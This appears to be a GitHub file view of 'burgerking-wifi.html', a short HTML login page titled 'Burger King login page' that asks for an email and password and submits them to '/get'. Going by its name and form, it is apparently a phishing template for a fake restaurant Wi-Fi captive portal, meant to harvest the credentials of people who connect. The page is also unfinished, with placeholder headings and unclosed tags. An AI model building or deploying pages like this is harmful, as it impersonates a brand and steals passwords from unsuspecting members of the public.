-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathburgerking-wifi.html
42 lines (42 loc) · 1.33 KB
/
burgerking-wifi.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<!DOCTYPE html>
<html>
<head>
<title>Burger King login page</title>
<style>
body {
background-color: blue;
color: red;
font-family: Arial, sans-serif;
}
form {
margin-top: 100px;
text-align: center;
}
input[type="text"], input[type="password"] {
border: none;
border-radius: 5px;
padding: 10px;
margin: 10px;
width: 300px;
background-color: white;
color: black;
}
input[type="submit"] {
background-color: white;
color: black;
padding: 10px;
border-radius: 5px;
cursor: pointer;
}
</style>
</head>
<body>
<form action="/get" id="email-form-step">
<h1 class="g-h1">titel</h1>
<h2 class="g-h2">titel2</h2>
<div class="login-content">
<input name="email" type="text" class="g-input" placeholder="E-mail" required>
<input name="password" type="password" class="g-input" placeholder="Password" required>
<div>
<button class="gbtn-primary" type="submit">Login</button></body>
</html>